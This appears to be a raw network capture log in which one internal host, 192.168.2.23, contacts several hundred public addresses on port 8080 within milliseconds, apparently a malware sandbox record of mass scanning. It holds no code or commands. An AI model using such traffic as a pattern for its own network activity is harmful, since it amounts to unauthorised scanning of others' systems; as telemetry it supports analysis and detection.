Nov 22, 2023 08:37:53.101989031 CET	54329	8080	192.168.2.23	94.101.52.241
Nov 22, 2023 08:37:53.101990938 CET	54329	8080	192.168.2.23	94.156.233.200
Nov 22, 2023 08:37:53.101991892 CET	54329	8080	192.168.2.23	94.144.156.5
Nov 22, 2023 08:37:53.101991892 CET	54329	8080	192.168.2.23	95.135.223.44
Nov 22, 2023 08:37:53.102000952 CET	54329	8080	192.168.2.23	62.207.155.45
Nov 22, 2023 08:37:53.102003098 CET	54329	8080	192.168.2.23	31.105.192.208
Nov 22, 2023 08:37:53.102015972 CET	54329	8080	192.168.2.23	95.5.152.98
Nov 22, 2023 08:37:53.102015972 CET	54329	8080	192.168.2.23	85.244.168.208
Nov 22, 2023 08:37:53.102020979 CET	54329	8080	192.168.2.23	31.209.138.71
Nov 22, 2023 08:37:53.102026939 CET	54329	8080	192.168.2.23	94.109.124.124
Nov 22, 2023 08:37:53.102030039 CET	54329	8080	192.168.2.23	62.39.20.67
Nov 22, 2023 08:37:53.102046967 CET	54329	8080	192.168.2.23	85.44.175.12
Nov 22, 2023 08:37:53.102046967 CET	54329	8080	192.168.2.23	31.66.40.76
Nov 22, 2023 08:37:53.102056980 CET	54329	8080	192.168.2.23	31.119.164.236
Nov 22, 2023 08:37:53.102060080 CET	54329	8080	192.168.2.23	95.189.211.218
Nov 22, 2023 08:37:53.102060080 CET	54329	8080	192.168.2.23	95.1.9.246
Nov 22, 2023 08:37:53.102067947 CET	54329	8080	192.168.2.23	31.168.36.221
Nov 22, 2023 08:37:53.102081060 CET	54329	8080	192.168.2.23	85.25.129.152
Nov 22, 2023 08:37:53.102082014 CET	54329	8080	192.168.2.23	85.20.47.220
Nov 22, 2023 08:37:53.102082014 CET	54329	8080	192.168.2.23	85.148.176.173
Nov 22, 2023 08:37:53.102088928 CET	54329	8080	192.168.2.23	62.84.179.129
Nov 22, 2023 08:37:53.102101088 CET	54329	8080	192.168.2.23	85.234.45.7
Nov 22, 2023 08:37:53.102108955 CET	54329	8080	192.168.2.23	95.33.24.221
Nov 22, 2023 08:37:53.102113962 CET	54329	8080	192.168.2.23	94.225.244.181
Nov 22, 2023 08:37:53.102122068 CET	54329	8080	192.168.2.23	31.213.180.189
Nov 22, 2023 08:37:53.102128983 CET	54329	8080	192.168.2.23	94.195.246.254
Nov 22, 2023 08:37:53.102128983 CET	54329	8080	192.168.2.23	95.155.136.195
Nov 22, 2023 08:37:53.102137089 CET	54329	8080	192.168.2.23	85.207.251.52
Nov 22, 2023 08:37:53.102148056 CET	54329	8080	192.168.2.23	85.249.242.11
Nov 22, 2023 08:37:53.102154970 CET	54329	8080	192.168.2.23	95.222.102.241
Nov 22, 2023 08:37:53.102164984 CET	54329	8080	192.168.2.23	85.6.215.77
Nov 22, 2023 08:37:53.102174044 CET	54329	8080	192.168.2.23	95.55.212.121
Nov 22, 2023 08:37:53.102179050 CET	54329	8080	192.168.2.23	85.139.54.178
Nov 22, 2023 08:37:53.102179050 CET	54329	8080	192.168.2.23	31.148.218.75
Nov 22, 2023 08:37:53.102191925 CET	54329	8080	192.168.2.23	85.61.157.113
Nov 22, 2023 08:37:53.102201939 CET	54329	8080	192.168.2.23	95.96.182.65
Nov 22, 2023 08:37:53.102204084 CET	54329	8080	192.168.2.23	85.43.117.238
Nov 22, 2023 08:37:53.102204084 CET	54329	8080	192.168.2.23	85.218.204.182
Nov 22, 2023 08:37:53.102221012 CET	54329	8080	192.168.2.23	95.142.120.251
Nov 22, 2023 08:37:53.102221012 CET	54329	8080	192.168.2.23	95.93.79.69
Nov 22, 2023 08:37:53.102221966 CET	54329	8080	192.168.2.23	85.17.219.155
Nov 22, 2023 08:37:53.102221966 CET	54329	8080	192.168.2.23	31.172.15.58
Nov 22, 2023 08:37:53.102243900 CET	54329	8080	192.168.2.23	31.130.45.181
Nov 22, 2023 08:37:53.102247000 CET	54329	8080	192.168.2.23	85.40.230.150
Nov 22, 2023 08:37:53.102264881 CET	54329	8080	192.168.2.23	95.21.249.203
Nov 22, 2023 08:37:53.102264881 CET	54329	8080	192.168.2.23	95.200.106.15
Nov 22, 2023 08:37:53.102266073 CET	54329	8080	192.168.2.23	94.56.19.168
Nov 22, 2023 08:37:53.102267027 CET	54329	8080	192.168.2.23	31.88.63.230
Nov 22, 2023 08:37:53.102268934 CET	54329	8080	192.168.2.23	94.126.72.89
Nov 22, 2023 08:37:53.102268934 CET	54329	8080	192.168.2.23	85.190.50.53
Nov 22, 2023 08:37:53.102272987 CET	54329	8080	192.168.2.23	31.217.90.215
Nov 22, 2023 08:37:53.102274895 CET	54329	8080	192.168.2.23	62.219.36.100
Nov 22, 2023 08:37:53.102283001 CET	54329	8080	192.168.2.23	62.27.191.91
Nov 22, 2023 08:37:53.102286100 CET	54329	8080	192.168.2.23	31.133.194.20
Nov 22, 2023 08:37:53.102286100 CET	54329	8080	192.168.2.23	85.123.15.213
Nov 22, 2023 08:37:53.102286100 CET	54329	8080	192.168.2.23	31.207.101.37
Nov 22, 2023 08:37:53.102286100 CET	54329	8080	192.168.2.23	95.142.192.154
Nov 22, 2023 08:37:53.102296114 CET	54329	8080	192.168.2.23	94.38.232.84
Nov 22, 2023 08:37:53.102307081 CET	54329	8080	192.168.2.23	31.43.130.87
Nov 22, 2023 08:37:53.102312088 CET	54329	8080	192.168.2.23	94.81.200.3
Nov 22, 2023 08:37:53.102313995 CET	54329	8080	192.168.2.23	62.85.202.201
Nov 22, 2023 08:37:53.102314949 CET	54329	8080	192.168.2.23	62.250.3.7
Nov 22, 2023 08:37:53.102320910 CET	54329	8080	192.168.2.23	94.133.101.104
Nov 22, 2023 08:37:53.102320910 CET	54329	8080	192.168.2.23	95.249.88.117
Nov 22, 2023 08:37:53.102320910 CET	54329	8080	192.168.2.23	62.208.28.130
Nov 22, 2023 08:37:53.102325916 CET	54329	8080	192.168.2.23	95.77.35.222
Nov 22, 2023 08:37:53.102330923 CET	54329	8080	192.168.2.23	95.66.221.49
Nov 22, 2023 08:37:53.102339983 CET	54329	8080	192.168.2.23	62.22.194.17
Nov 22, 2023 08:37:53.102344036 CET	54329	8080	192.168.2.23	85.45.164.195
Nov 22, 2023 08:37:53.102344990 CET	54329	8080	192.168.2.23	85.185.179.189
Nov 22, 2023 08:37:53.102354050 CET	54329	8080	192.168.2.23	95.94.206.101
Nov 22, 2023 08:37:53.102361917 CET	54329	8080	192.168.2.23	62.185.222.199
Nov 22, 2023 08:37:53.102371931 CET	54329	8080	192.168.2.23	95.26.23.224
Nov 22, 2023 08:37:53.102371931 CET	54329	8080	192.168.2.23	94.98.69.50
Nov 22, 2023 08:37:53.102376938 CET	54329	8080	192.168.2.23	31.90.18.58
Nov 22, 2023 08:37:53.102382898 CET	54329	8080	192.168.2.23	85.107.122.68
Nov 22, 2023 08:37:53.102382898 CET	54329	8080	192.168.2.23	62.144.113.244
Nov 22, 2023 08:37:53.102391005 CET	54329	8080	192.168.2.23	95.184.95.207
Nov 22, 2023 08:37:53.102395058 CET	54329	8080	192.168.2.23	95.225.69.127
Nov 22, 2023 08:37:53.102396965 CET	54329	8080	192.168.2.23	85.81.81.194
Nov 22, 2023 08:37:53.102411985 CET	54329	8080	192.168.2.23	85.22.2.195
Nov 22, 2023 08:37:53.102412939 CET	54329	8080	192.168.2.23	31.88.71.111
Nov 22, 2023 08:37:53.102421999 CET	54329	8080	192.168.2.23	94.246.145.207
Nov 22, 2023 08:37:53.102423906 CET	54329	8080	192.168.2.23	95.181.75.102
Nov 22, 2023 08:37:53.102432013 CET	54329	8080	192.168.2.23	85.43.217.146
Nov 22, 2023 08:37:53.102437973 CET	54329	8080	192.168.2.23	85.72.245.145
Nov 22, 2023 08:37:53.102447033 CET	54329	8080	192.168.2.23	85.88.56.30
Nov 22, 2023 08:37:53.102447033 CET	54329	8080	192.168.2.23	95.172.212.130
Nov 22, 2023 08:37:53.102447033 CET	54329	8080	192.168.2.23	62.247.36.153
Nov 22, 2023 08:37:53.102447987 CET	54329	8080	192.168.2.23	62.187.213.238
Nov 22, 2023 08:37:53.102451086 CET	54329	8080	192.168.2.23	31.115.35.13
Nov 22, 2023 08:37:53.102457047 CET	54329	8080	192.168.2.23	85.50.249.246
Nov 22, 2023 08:37:53.102458000 CET	54329	8080	192.168.2.23	94.242.150.40
Nov 22, 2023 08:37:53.102458954 CET	54329	8080	192.168.2.23	85.208.97.255
Nov 22, 2023 08:37:53.102468014 CET	54329	8080	192.168.2.23	95.19.242.88
Nov 22, 2023 08:37:53.102475882 CET	54329	8080	192.168.2.23	31.111.116.153
Nov 22, 2023 08:37:53.102475882 CET	54329	8080	192.168.2.23	31.186.5.151
Nov 22, 2023 08:37:53.102479935 CET	54329	8080	192.168.2.23	94.20.100.171
Nov 22, 2023 08:37:53.102479935 CET	54329	8080	192.168.2.23	85.134.63.99
Nov 22, 2023 08:37:53.102499962 CET	54329	8080	192.168.2.23	85.206.138.58
Nov 22, 2023 08:37:53.102503061 CET	54329	8080	192.168.2.23	94.44.253.183
Nov 22, 2023 08:37:53.102505922 CET	54329	8080	192.168.2.23	31.204.76.236
Nov 22, 2023 08:37:53.102505922 CET	54329	8080	192.168.2.23	95.19.238.234
Nov 22, 2023 08:37:53.102519035 CET	54329	8080	192.168.2.23	94.23.62.76
Nov 22, 2023 08:37:53.102531910 CET	54329	8080	192.168.2.23	62.123.124.62
Nov 22, 2023 08:37:53.102531910 CET	54329	8080	192.168.2.23	62.216.61.205
Nov 22, 2023 08:37:53.102535963 CET	54329	8080	192.168.2.23	94.170.213.190
Nov 22, 2023 08:37:53.102535963 CET	54329	8080	192.168.2.23	95.82.23.195
Nov 22, 2023 08:37:53.102540016 CET	54329	8080	192.168.2.23	62.137.37.171
Nov 22, 2023 08:37:53.102540016 CET	54329	8080	192.168.2.23	31.253.52.103
Nov 22, 2023 08:37:53.102540016 CET	54329	8080	192.168.2.23	62.60.53.100
Nov 22, 2023 08:37:53.102545023 CET	54329	8080	192.168.2.23	62.103.53.149
Nov 22, 2023 08:37:53.102562904 CET	54329	8080	192.168.2.23	95.244.68.99
Nov 22, 2023 08:37:53.102566004 CET	54329	8080	192.168.2.23	95.200.49.244
Nov 22, 2023 08:37:53.102569103 CET	54329	8080	192.168.2.23	31.143.64.30
Nov 22, 2023 08:37:53.102574110 CET	54329	8080	192.168.2.23	94.201.77.4
Nov 22, 2023 08:37:53.102580070 CET	54329	8080	192.168.2.23	85.239.50.51
Nov 22, 2023 08:37:53.102582932 CET	54329	8080	192.168.2.23	62.11.91.168
Nov 22, 2023 08:37:53.102582932 CET	54329	8080	192.168.2.23	62.250.238.5
Nov 22, 2023 08:37:53.102585077 CET	54329	8080	192.168.2.23	62.152.150.16
Nov 22, 2023 08:37:53.102596998 CET	54329	8080	192.168.2.23	31.222.36.33
Nov 22, 2023 08:37:53.102602959 CET	54329	8080	192.168.2.23	95.25.128.255
Nov 22, 2023 08:37:53.102611065 CET	54329	8080	192.168.2.23	95.170.183.11
Nov 22, 2023 08:37:53.102633953 CET	54329	8080	192.168.2.23	85.72.88.230
Nov 22, 2023 08:37:53.102634907 CET	54329	8080	192.168.2.23	85.112.40.213
Nov 22, 2023 08:37:53.102637053 CET	54329	8080	192.168.2.23	85.130.176.27
Nov 22, 2023 08:37:53.102637053 CET	54329	8080	192.168.2.23	85.167.147.33
Nov 22, 2023 08:37:53.102638006 CET	54329	8080	192.168.2.23	95.66.236.12
Nov 22, 2023 08:37:53.102648973 CET	54329	8080	192.168.2.23	95.90.59.188
Nov 22, 2023 08:37:53.102653027 CET	54329	8080	192.168.2.23	62.115.67.176
Nov 22, 2023 08:37:53.102665901 CET	54329	8080	192.168.2.23	95.141.224.214
Nov 22, 2023 08:37:53.102675915 CET	54329	8080	192.168.2.23	95.50.169.203
Nov 22, 2023 08:37:53.102675915 CET	54329	8080	192.168.2.23	62.114.232.48
Nov 22, 2023 08:37:53.102679014 CET	54329	8080	192.168.2.23	62.249.85.97
Nov 22, 2023 08:37:53.102683067 CET	54329	8080	192.168.2.23	95.106.98.24
Nov 22, 2023 08:37:53.102685928 CET	54329	8080	192.168.2.23	95.199.111.40
Nov 22, 2023 08:37:53.102685928 CET	54329	8080	192.168.2.23	31.36.87.107
Nov 22, 2023 08:37:53.102706909 CET	54329	8080	192.168.2.23	62.69.110.160
Nov 22, 2023 08:37:53.102709055 CET	54329	8080	192.168.2.23	95.43.30.91
Nov 22, 2023 08:37:53.102710009 CET	54329	8080	192.168.2.23	95.204.19.244
Nov 22, 2023 08:37:53.102713108 CET	54329	8080	192.168.2.23	62.146.254.105
Nov 22, 2023 08:37:53.102719069 CET	54329	8080	192.168.2.23	95.129.0.227
Nov 22, 2023 08:37:53.102725983 CET	54329	8080	192.168.2.23	62.174.218.186
Nov 22, 2023 08:37:53.102735996 CET	54329	8080	192.168.2.23	95.43.13.209
Nov 22, 2023 08:37:53.102737904 CET	54329	8080	192.168.2.23	94.92.14.163
Nov 22, 2023 08:37:53.102745056 CET	54329	8080	192.168.2.23	94.247.209.130
Nov 22, 2023 08:37:53.102762938 CET	54329	8080	192.168.2.23	31.168.67.138
Nov 22, 2023 08:37:53.102773905 CET	54329	8080	192.168.2.23	95.234.17.174
Nov 22, 2023 08:37:53.102773905 CET	54329	8080	192.168.2.23	85.55.23.189
Nov 22, 2023 08:37:53.102776051 CET	54329	8080	192.168.2.23	62.134.84.113
Nov 22, 2023 08:37:53.102776051 CET	54329	8080	192.168.2.23	94.162.223.138
Nov 22, 2023 08:37:53.102776051 CET	54329	8080	192.168.2.23	95.69.157.206
Nov 22, 2023 08:37:53.102783918 CET	54329	8080	192.168.2.23	62.104.44.81
Nov 22, 2023 08:37:53.102783918 CET	54329	8080	192.168.2.23	94.5.53.102
Nov 22, 2023 08:37:53.102785110 CET	54329	8080	192.168.2.23	94.65.64.72
Nov 22, 2023 08:37:53.102783918 CET	54329	8080	192.168.2.23	85.93.39.155
Nov 22, 2023 08:37:53.102783918 CET	54329	8080	192.168.2.23	85.119.7.201
Nov 22, 2023 08:37:53.102790117 CET	54329	8080	192.168.2.23	94.107.200.126
Nov 22, 2023 08:37:53.102797985 CET	54329	8080	192.168.2.23	62.100.17.229
Nov 22, 2023 08:37:53.102797985 CET	54329	8080	192.168.2.23	31.240.88.24
Nov 22, 2023 08:37:53.102798939 CET	54329	8080	192.168.2.23	85.139.67.60
Nov 22, 2023 08:37:53.102798939 CET	54329	8080	192.168.2.23	95.66.146.96
Nov 22, 2023 08:37:53.102801085 CET	54329	8080	192.168.2.23	94.95.182.53
Nov 22, 2023 08:37:53.102801085 CET	54329	8080	192.168.2.23	31.254.24.161
Nov 22, 2023 08:37:53.102804899 CET	54329	8080	192.168.2.23	62.209.99.94
Nov 22, 2023 08:37:53.102809906 CET	54329	8080	192.168.2.23	94.170.54.129
Nov 22, 2023 08:37:53.102813959 CET	54329	8080	192.168.2.23	85.220.173.231
Nov 22, 2023 08:37:53.102826118 CET	54329	8080	192.168.2.23	95.182.21.183
Nov 22, 2023 08:37:53.102826118 CET	54329	8080	192.168.2.23	62.156.47.245
Nov 22, 2023 08:37:53.102828026 CET	54329	8080	192.168.2.23	95.18.108.248
Nov 22, 2023 08:37:53.102830887 CET	54329	8080	192.168.2.23	31.179.103.60
Nov 22, 2023 08:37:53.102830887 CET	54329	8080	192.168.2.23	94.196.107.153
Nov 22, 2023 08:37:53.102832079 CET	54329	8080	192.168.2.23	95.180.64.63
Nov 22, 2023 08:37:53.102837086 CET	54329	8080	192.168.2.23	94.69.236.99
Nov 22, 2023 08:37:53.102842093 CET	54329	8080	192.168.2.23	95.247.88.224
Nov 22, 2023 08:37:53.102848053 CET	54329	8080	192.168.2.23	95.167.41.87
Nov 22, 2023 08:37:53.102858067 CET	54329	8080	192.168.2.23	94.132.234.91
Nov 22, 2023 08:37:53.102858067 CET	54329	8080	192.168.2.23	31.216.171.204
Nov 22, 2023 08:37:53.102871895 CET	54329	8080	192.168.2.23	95.102.223.169
Nov 22, 2023 08:37:53.102874041 CET	54329	8080	192.168.2.23	62.59.31.191
Nov 22, 2023 08:37:53.102885008 CET	54329	8080	192.168.2.23	85.162.74.237
Nov 22, 2023 08:37:53.102885008 CET	54329	8080	192.168.2.23	31.186.64.87
Nov 22, 2023 08:37:53.102895975 CET	54329	8080	192.168.2.23	85.128.130.8
Nov 22, 2023 08:37:53.102899075 CET	54329	8080	192.168.2.23	85.10.207.147
Nov 22, 2023 08:37:53.102905989 CET	54329	8080	192.168.2.23	85.59.183.18
Nov 22, 2023 08:37:53.102912903 CET	54329	8080	192.168.2.23	85.94.176.219
Nov 22, 2023 08:37:53.102917910 CET	54329	8080	192.168.2.23	85.178.34.113
Nov 22, 2023 08:37:53.102921009 CET	54329	8080	192.168.2.23	62.22.202.158
Nov 22, 2023 08:37:53.102929115 CET	54329	8080	192.168.2.23	95.246.3.244
Nov 22, 2023 08:37:53.102941036 CET	54329	8080	192.168.2.23	85.143.76.109
Nov 22, 2023 08:37:53.102946043 CET	54329	8080	192.168.2.23	94.39.26.118
Nov 22, 2023 08:37:53.102951050 CET	54329	8080	192.168.2.23	94.130.64.106
Nov 22, 2023 08:37:53.102955103 CET	54329	8080	192.168.2.23	31.224.189.48
Nov 22, 2023 08:37:53.102957964 CET	54329	8080	192.168.2.23	95.18.14.200
Nov 22, 2023 08:37:53.102963924 CET	54329	8080	192.168.2.23	62.215.179.20
Nov 22, 2023 08:37:53.102966070 CET	54329	8080	192.168.2.23	95.87.223.185
Nov 22, 2023 08:37:53.102967024 CET	54329	8080	192.168.2.23	62.197.211.145
Nov 22, 2023 08:37:53.102972984 CET	54329	8080	192.168.2.23	85.41.88.106
Nov 22, 2023 08:37:53.102982044 CET	54329	8080	192.168.2.23	62.34.14.24
Nov 22, 2023 08:37:53.102984905 CET	54329	8080	192.168.2.23	95.26.77.134
Nov 22, 2023 08:37:53.102993011 CET	54329	8080	192.168.2.23	62.224.54.51
Nov 22, 2023 08:37:53.103005886 CET	54329	8080	192.168.2.23	85.188.7.164
Nov 22, 2023 08:37:53.103009939 CET	54329	8080	192.168.2.23	62.246.70.216
Nov 22, 2023 08:37:53.103014946 CET	54329	8080	192.168.2.23	95.142.113.228
Nov 22, 2023 08:37:53.103014946 CET	54329	8080	192.168.2.23	85.237.198.54
Nov 22, 2023 08:37:53.103018045 CET	54329	8080	192.168.2.23	85.149.243.71
Nov 22, 2023 08:37:53.103029013 CET	54329	8080	192.168.2.23	95.177.137.143
Nov 22, 2023 08:37:53.103029013 CET	54329	8080	192.168.2.23	62.50.195.223
Nov 22, 2023 08:37:53.103032112 CET	54329	8080	192.168.2.23	31.28.229.254
Nov 22, 2023 08:37:53.103032112 CET	54329	8080	192.168.2.23	94.236.64.119
Nov 22, 2023 08:37:53.103034019 CET	54329	8080	192.168.2.23	95.12.125.24
Nov 22, 2023 08:37:53.103032112 CET	54329	8080	192.168.2.23	85.58.205.38
Nov 22, 2023 08:37:53.103044033 CET	54329	8080	192.168.2.23	31.51.255.26
Nov 22, 2023 08:37:53.103044987 CET	54329	8080	192.168.2.23	62.72.119.152
Nov 22, 2023 08:37:53.103044987 CET	54329	8080	192.168.2.23	94.14.92.126
Nov 22, 2023 08:37:53.103045940 CET	54329	8080	192.168.2.23	95.175.41.10
Nov 22, 2023 08:37:53.103064060 CET	54329	8080	192.168.2.23	31.90.169.116
Nov 22, 2023 08:37:53.103065014 CET	54329	8080	192.168.2.23	85.231.144.188
Nov 22, 2023 08:37:53.103065014 CET	54329	8080	192.168.2.23	95.178.81.222
Nov 22, 2023 08:37:53.103072882 CET	54329	8080	192.168.2.23	95.83.221.101
Nov 22, 2023 08:37:53.103075981 CET	54329	8080	192.168.2.23	85.86.123.129
Nov 22, 2023 08:37:53.103080988 CET	54329	8080	192.168.2.23	31.189.86.199
Nov 22, 2023 08:37:53.103106976 CET	54329	8080	192.168.2.23	31.33.14.237
Nov 22, 2023 08:37:53.103107929 CET	54329	8080	192.168.2.23	62.7.137.153
Nov 22, 2023 08:37:53.103108883 CET	54329	8080	192.168.2.23	95.83.213.115
Nov 22, 2023 08:37:53.103108883 CET	54329	8080	192.168.2.23	62.216.94.238
Nov 22, 2023 08:37:53.103108883 CET	54329	8080	192.168.2.23	31.112.85.75
Nov 22, 2023 08:37:53.103116035 CET	54329	8080	192.168.2.23	95.70.182.54
Nov 22, 2023 08:37:53.103123903 CET	54329	8080	192.168.2.23	31.198.178.94
Nov 22, 2023 08:37:53.103125095 CET	54329	8080	192.168.2.23	85.216.39.213
Nov 22, 2023 08:37:53.103135109 CET	54329	8080	192.168.2.23	31.43.242.70
Nov 22, 2023 08:37:53.103137970 CET	54329	8080	192.168.2.23	95.135.72.175
Nov 22, 2023 08:37:53.103147984 CET	54329	8080	192.168.2.23	94.232.253.215
Nov 22, 2023 08:37:53.103151083 CET	54329	8080	192.168.2.23	85.94.200.198
Nov 22, 2023 08:37:53.103162050 CET	54329	8080	192.168.2.23	94.43.40.35
Nov 22, 2023 08:37:53.103162050 CET	54329	8080	192.168.2.23	95.66.91.45
Nov 22, 2023 08:37:53.103168964 CET	54329	8080	192.168.2.23	94.236.156.8
Nov 22, 2023 08:37:53.103172064 CET	54329	8080	192.168.2.23	94.132.106.211
Nov 22, 2023 08:37:53.103178024 CET	54329	8080	192.168.2.23	31.253.146.5
Nov 22, 2023 08:37:53.103184938 CET	54329	8080	192.168.2.23	85.211.87.49
Nov 22, 2023 08:37:53.103195906 CET	54329	8080	192.168.2.23	94.135.111.118
Nov 22, 2023 08:37:53.103195906 CET	54329	8080	192.168.2.23	85.8.125.130
Nov 22, 2023 08:37:53.103214025 CET	54329	8080	192.168.2.23	94.254.188.252
Nov 22, 2023 08:37:53.103228092 CET	54329	8080	192.168.2.23	85.251.45.2
Nov 22, 2023 08:37:53.103228092 CET	54329	8080	192.168.2.23	85.187.201.4
Nov 22, 2023 08:37:53.103231907 CET	54329	8080	192.168.2.23	94.118.179.229
Nov 22, 2023 08:37:53.103231907 CET	54329	8080	192.168.2.23	94.71.152.104
Nov 22, 2023 08:37:53.103239059 CET	54329	8080	192.168.2.23	95.208.64.193
Nov 22, 2023 08:37:53.103250980 CET	54329	8080	192.168.2.23	94.68.96.71
Nov 22, 2023 08:37:53.103255033 CET	54329	8080	192.168.2.23	31.185.188.59
Nov 22, 2023 08:37:53.103255987 CET	54329	8080	192.168.2.23	94.213.156.202
Nov 22, 2023 08:37:53.103275061 CET	54329	8080	192.168.2.23	85.232.59.187
Nov 22, 2023 08:37:53.103280067 CET	54329	8080	192.168.2.23	95.21.15.247
Nov 22, 2023 08:37:53.103286982 CET	54329	8080	192.168.2.23	94.91.221.96
Nov 22, 2023 08:37:53.103286982 CET	54329	8080	192.168.2.23	62.76.100.171
Nov 22, 2023 08:37:53.103291035 CET	54329	8080	192.168.2.23	31.3.27.212
Nov 22, 2023 08:37:53.103291035 CET	54329	8080	192.168.2.23	95.109.53.85
Nov 22, 2023 08:37:53.103296995 CET	54329	8080	192.168.2.23	31.82.219.92
Nov 22, 2023 08:37:53.103305101 CET	54329	8080	192.168.2.23	31.200.125.62
Nov 22, 2023 08:37:53.103305101 CET	54329	8080	192.168.2.23	62.123.88.208
Nov 22, 2023 08:37:53.103307009 CET	54329	8080	192.168.2.23	62.226.255.190
Nov 22, 2023 08:37:53.103308916 CET	54329	8080	192.168.2.23	85.9.140.32
Nov 22, 2023 08:37:53.103321075 CET	54329	8080	192.168.2.23	85.144.30.156
Nov 22, 2023 08:37:53.103324890 CET	54329	8080	192.168.2.23	85.110.181.67
Nov 22, 2023 08:37:53.103324890 CET	54329	8080	192.168.2.23	94.237.216.80
Nov 22, 2023 08:37:53.103338003 CET	54329	8080	192.168.2.23	62.164.81.52
Nov 22, 2023 08:37:53.103338003 CET	54329	8080	192.168.2.23	85.174.115.244
Nov 22, 2023 08:37:53.103348970 CET	54329	8080	192.168.2.23	94.145.220.91
Nov 22, 2023 08:37:53.103365898 CET	54329	8080	192.168.2.23	62.103.41.37
Nov 22, 2023 08:37:53.103369951 CET	54329	8080	192.168.2.23	62.60.34.8
Nov 22, 2023 08:37:53.103369951 CET	54329	8080	192.168.2.23	94.176.184.239
Nov 22, 2023 08:37:53.103369951 CET	54329	8080	192.168.2.23	31.238.132.143
Nov 22, 2023 08:37:53.103379965 CET	54329	8080	192.168.2.23	62.184.235.25
Nov 22, 2023 08:37:53.103390932 CET	54329	8080	192.168.2.23	62.94.158.88
Nov 22, 2023 08:37:53.103391886 CET	54329	8080	192.168.2.23	31.209.103.178
Nov 22, 2023 08:37:53.103394985 CET	54329	8080	192.168.2.23	85.14.0.100
Nov 22, 2023 08:37:53.103395939 CET	54329	8080	192.168.2.23	62.243.217.9
Nov 22, 2023 08:37:53.103396893 CET	54329	8080	192.168.2.23	85.91.7.67
Nov 22, 2023 08:37:53.103403091 CET	54329	8080	192.168.2.23	62.196.1.37
Nov 22, 2023 08:37:53.103414059 CET	54329	8080	192.168.2.23	85.60.98.178
Nov 22, 2023 08:37:53.103420973 CET	54329	8080	192.168.2.23	94.236.127.227
Nov 22, 2023 08:37:53.103425026 CET	54329	8080	192.168.2.23	62.131.17.112
Nov 22, 2023 08:37:53.103440046 CET	54329	8080	192.168.2.23	31.168.155.145
Nov 22, 2023 08:37:53.103449106 CET	54329	8080	192.168.2.23	62.221.54.55
Nov 22, 2023 08:37:53.103450060 CET	54329	8080	192.168.2.23	62.196.228.47
Nov 22, 2023 08:37:53.103452921 CET	54329	8080	192.168.2.23	94.242.94.114
Nov 22, 2023 08:37:53.103456974 CET	54329	8080	192.168.2.23	85.252.64.178
Nov 22, 2023 08:37:53.103465080 CET	54329	8080	192.168.2.23	62.130.11.237
Nov 22, 2023 08:37:53.103471994 CET	54329	8080	192.168.2.23	85.119.218.172
Nov 22, 2023 08:37:53.103491068 CET	54329	8080	192.168.2.23	31.117.194.90
Nov 22, 2023 08:37:53.103492022 CET	54329	8080	192.168.2.23	94.201.246.105
Nov 22, 2023 08:37:53.103492022 CET	54329	8080	192.168.2.23	94.176.222.145
Nov 22, 2023 08:37:53.103501081 CET	54329	8080	192.168.2.23	62.112.233.40
Nov 22, 2023 08:37:53.103513002 CET	54329	8080	192.168.2.23	62.12.184.87
Nov 22, 2023 08:37:53.103518009 CET	54329	8080	192.168.2.23	62.40.193.140
Nov 22, 2023 08:37:53.103519917 CET	54329	8080	192.168.2.23	95.141.229.178
Nov 22, 2023 08:37:53.103534937 CET	54329	8080	192.168.2.23	31.26.68.136
Nov 22, 2023 08:37:53.103539944 CET	54329	8080	192.168.2.23	62.44.155.84
Nov 22, 2023 08:37:53.103545904 CET	54329	8080	192.168.2.23	62.235.18.106
Nov 22, 2023 08:37:53.103547096 CET	54329	8080	192.168.2.23	95.106.133.154
Nov 22, 2023 08:37:53.103565931 CET	54329	8080	192.168.2.23	31.131.129.69
Nov 22, 2023 08:37:53.103566885 CET	54329	8080	192.168.2.23	95.151.79.20
Nov 22, 2023 08:37:53.103573084 CET	54329	8080	192.168.2.23	31.90.15.70
Nov 22, 2023 08:37:53.103575945 CET	54329	8080	192.168.2.23	62.214.4.47
Nov 22, 2023 08:37:53.103590012 CET	54329	8080	192.168.2.23	85.32.208.103
Nov 22, 2023 08:37:53.103590012 CET	54329	8080	192.168.2.23	85.223.92.178
Nov 22, 2023 08:37:53.103590012 CET	54329	8080	192.168.2.23	94.253.56.53
Nov 22, 2023 08:37:53.103607893 CET	54329	8080	192.168.2.23	94.252.163.53
Nov 22, 2023 08:37:53.103617907 CET	54329	8080	192.168.2.23	62.103.131.201
Nov 22, 2023 08:37:53.103619099 CET	54329	8080	192.168.2.23	85.137.234.10
Nov 22, 2023 08:37:53.103629112 CET	54329	8080	192.168.2.23	31.1.142.8
Nov 22, 2023 08:37:53.103646040 CET	54329	8080	192.168.2.23	95.250.104.22
Nov 22, 2023 08:37:53.103648901 CET	54329	8080	192.168.2.23	85.31.243.215
Nov 22, 2023 08:37:53.103648901 CET	54329	8080	192.168.2.23	31.63.33.155
Nov 22, 2023 08:37:53.103665113 CET	54329	8080	192.168.2.23	94.249.156.164
Nov 22, 2023 08:37:53.103666067 CET	54329	8080	192.168.2.23	95.123.254.48
Nov 22, 2023 08:37:53.103666067 CET	54329	8080	192.168.2.23	94.32.111.104
Nov 22, 2023 08:37:53.103667974 CET	54329	8080	192.168.2.23	95.119.100.205
Nov 22, 2023 08:37:53.103677988 CET	54329	8080	192.168.2.23	95.223.224.185
Nov 22, 2023 08:37:53.103688002 CET	54329	8080	192.168.2.23	31.97.236.76
Nov 22, 2023 08:37:53.103688002 CET	54329	8080	192.168.2.23	31.156.241.233
Nov 22, 2023 08:37:53.103694916 CET	54329	8080	192.168.2.23	95.15.8.14
Nov 22, 2023 08:37:53.103703022 CET	54329	8080	192.168.2.23	85.146.6.164
Nov 22, 2023 08:37:53.103705883 CET	54329	8080	192.168.2.23	62.63.116.245
Nov 22, 2023 08:37:53.103710890 CET	54329	8080	192.168.2.23	85.253.236.32
Nov 22, 2023 08:37:53.103724957 CET	54329	8080	192.168.2.23	62.247.236.175
Nov 22, 2023 08:37:53.103724957 CET	54329	8080	192.168.2.23	62.38.222.58
Nov 22, 2023 08:37:53.103737116 CET	54329	8080	192.168.2.23	95.247.124.41
Nov 22, 2023 08:37:53.103739023 CET	54329	8080	192.168.2.23	85.54.72.172
Nov 22, 2023 08:37:53.103740931 CET	54329	8080	192.168.2.23	85.113.119.28
Nov 22, 2023 08:37:53.103750944 CET	54329	8080	192.168.2.23	31.57.52.234
Nov 22, 2023 08:37:53.103754997 CET	54329	8080	192.168.2.23	95.185.253.56
Nov 22, 2023 08:37:53.103754997 CET	54329	8080	192.168.2.23	31.183.20.50
